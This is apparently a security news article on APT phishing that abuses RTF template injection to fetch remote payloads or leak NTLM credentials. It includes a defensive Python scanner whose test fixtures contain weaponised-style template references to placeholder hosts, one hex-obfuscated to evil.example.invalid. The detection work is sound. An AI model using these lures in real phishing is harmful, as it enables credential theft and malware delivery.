In their latest phishing attacks, three APT hacking gangs from India, Russia, and China were discovered employing a new RTF (rich text format) template injection approach. It is a straightforward but effective method to download malicious material from a remote URL, and security researchers believe many threat actors will soon adopt it. In March 2021, Proofpoint researchers discovered the first instances of weaponized RTF template injection, and since then, actors have been continuously improving the approach.
RTF files are a Microsoft-created document format that can be opened with Microsoft Word, WordPad, and other applications present on practically all operating systems. When creating an RTF file, you may reference an RTF Template that specifies how the text in the document should be formatted. These templates are local files that the RTF viewer loads before the document’s contents are displayed, so that the text is formatted correctly.
Threat actors are currently abusing this legitimate capability to retrieve a resource from a URL instead of from a local file, even though RTF Templates are supposed to be hosted locally. With this substitution, threat actors can inject malicious payloads into Microsoft Word or trigger NTLM authentication towards a remote URL to steal Windows credentials. Also, because the malicious content is fetched as an RTF Template rather than embedded in the RTF file, it is not present in the file at the time of delivery, so the phishing lure is more likely to evade detection.
Since RTF Template injection is simple to perform with a hex editor and is not as readily detected by antivirus scanners, it is likely to grow increasingly popular among threat actors.
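The technique described above changes nothing but the target of the template reference, which is exactly what a defender can look for. The following scanner is an added example written for this article, not code from Proofpoint or from any vendor: it locates the RTF template destination (the `\*\template` control word from the RTF specification; accepting the form without the leading `\*` is an assumption), decodes the RTF `\'hh` hex escapes that actors use to hide the target from naive string matching, and flags any target that is a URL or a UNC path rather than a local file. All sample RTF fragments are constructed for the example and use reserved `.invalid` hostnames.

```python
import re
from urllib.parse import urlparse

# Matches the template destination control word. The "\*" prefix is what the RTF
# spec uses for this destination; matching it without the prefix is an assumption.
TEMPLATE_RE = re.compile(rb"\\(?:\*\\)?template\b")

# Schemes whose presence in a template reference means Word would fetch remotely.
REMOTE_SCHEMES = {"http", "https", "ftp", "file"}

# Constructed test documents (not real malware samples).
SAMPLES = {
    "benign_local":   rb"{\rtf1\ansi{\*\template C:\\Templates\\Normal.dotm}Hello}",
    "remote_http":    rb"{\rtf1\ansi{\*\template http://template.example.invalid/t.dotm}Hello}",
    "remote_unc":     rb"{\rtf1\ansi{\*\template \\\\fileshare.example.invalid\\share\\t.dotm}Hello}",
    "hex_obfuscated": rb"{\rtf1\ansi{\*\template \'68\'74\'74\'70://evil.example.invalid/t.dotm}Hello}",
    "no_template":    rb"{\rtf1\ansi Hello}",
}


def extract_template_target(rtf: bytes):
    """Return the decoded template path/URL, or None if the document has none."""
    m = TEMPLATE_RE.search(rtf)
    if not m:
        return None
    out = bytearray()
    depth = 0
    i = m.end()
    while i < len(rtf):
        c = rtf[i:i + 1]
        if c == b"{":
            depth += 1
            i += 1
        elif c == b"}":
            if depth == 0:          # end of the \template destination group
                break
            depth -= 1
            i += 1
        elif c == b"\\":
            nxt = rtf[i + 1:i + 2]
            if nxt == b"'":         # \'hh hex escape: decode to the raw byte
                out += bytes([int(rtf[i + 2:i + 4], 16)])
                i += 4
            elif nxt in (b"\\", b"{", b"}"):   # escaped literal character
                out += nxt
                i += 2
            else:                   # other control word: skip name, number, delimiter
                j = i + 1
                while j < len(rtf) and rtf[j:j + 1].isalpha():
                    j += 1
                while j < len(rtf) and (rtf[j:j + 1].isdigit() or rtf[j:j + 1] == b"-"):
                    j += 1
                if rtf[j:j + 1] == b" ":
                    j += 1
                i = j
        else:
            out += c
            i += 1
    return bytes(out).strip().decode("latin-1")


def classify_target(target):
    """Label the template reference by where Word would try to load it from."""
    if target is None:
        return "no-template"
    if target.startswith("\\\\") or target.startswith("//"):
        return "remote-unc"       # SMB/WebDAV fetch; can trigger NTLM authentication
    if urlparse(target).scheme.lower() in REMOTE_SCHEMES:
        return "remote-url"
    return "local"


def scan_rtf(rtf: bytes) -> dict:
    target = extract_template_target(rtf)
    verdict = classify_target(target)
    return {"target": target, "verdict": verdict, "suspicious": verdict.startswith("remote")}


def scan_samples() -> dict:
    return {name: scan_rtf(doc) for name, doc in SAMPLES.items()}


if __name__ == "__main__":
    for name, result in scan_samples().items():
        print(f"{name:15} {result['verdict']:12} {result['target']}")
```

A mail gateway or endpoint script can call `scan_rtf()` on any attachment with an RTF signature and quarantine files where `suspicious` is true; only the target string is inspected, so the file is never opened by Word. Because the decoder resolves hex escapes before classification, the `hex_obfuscated` sample is reported as `remote-url` just like the plain `remote_http` one.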
According to Proofpoint’s researchers, “the viability of XML Office based remote template documents has proven that this type of delivery mechanism is a durable and effective method when paired with phishing as an initial delivery vector.”
“While this method currently is used by a limited number of APT actors with a range of sophistication, the technique’s effectiveness combined with its ease of use is likely to drive its adoption further across the threat landscape.”
Moreover, because the malicious content is fetched from a remote URL, threat actors can adjust their campaigns in real time to serve alternative payloads or malicious behaviors. To protect yourself from this attack, avoid downloading and opening RTF files from unsolicited emails, scan them with an antivirus program, and keep Microsoft Office up to date by installing the latest security updates.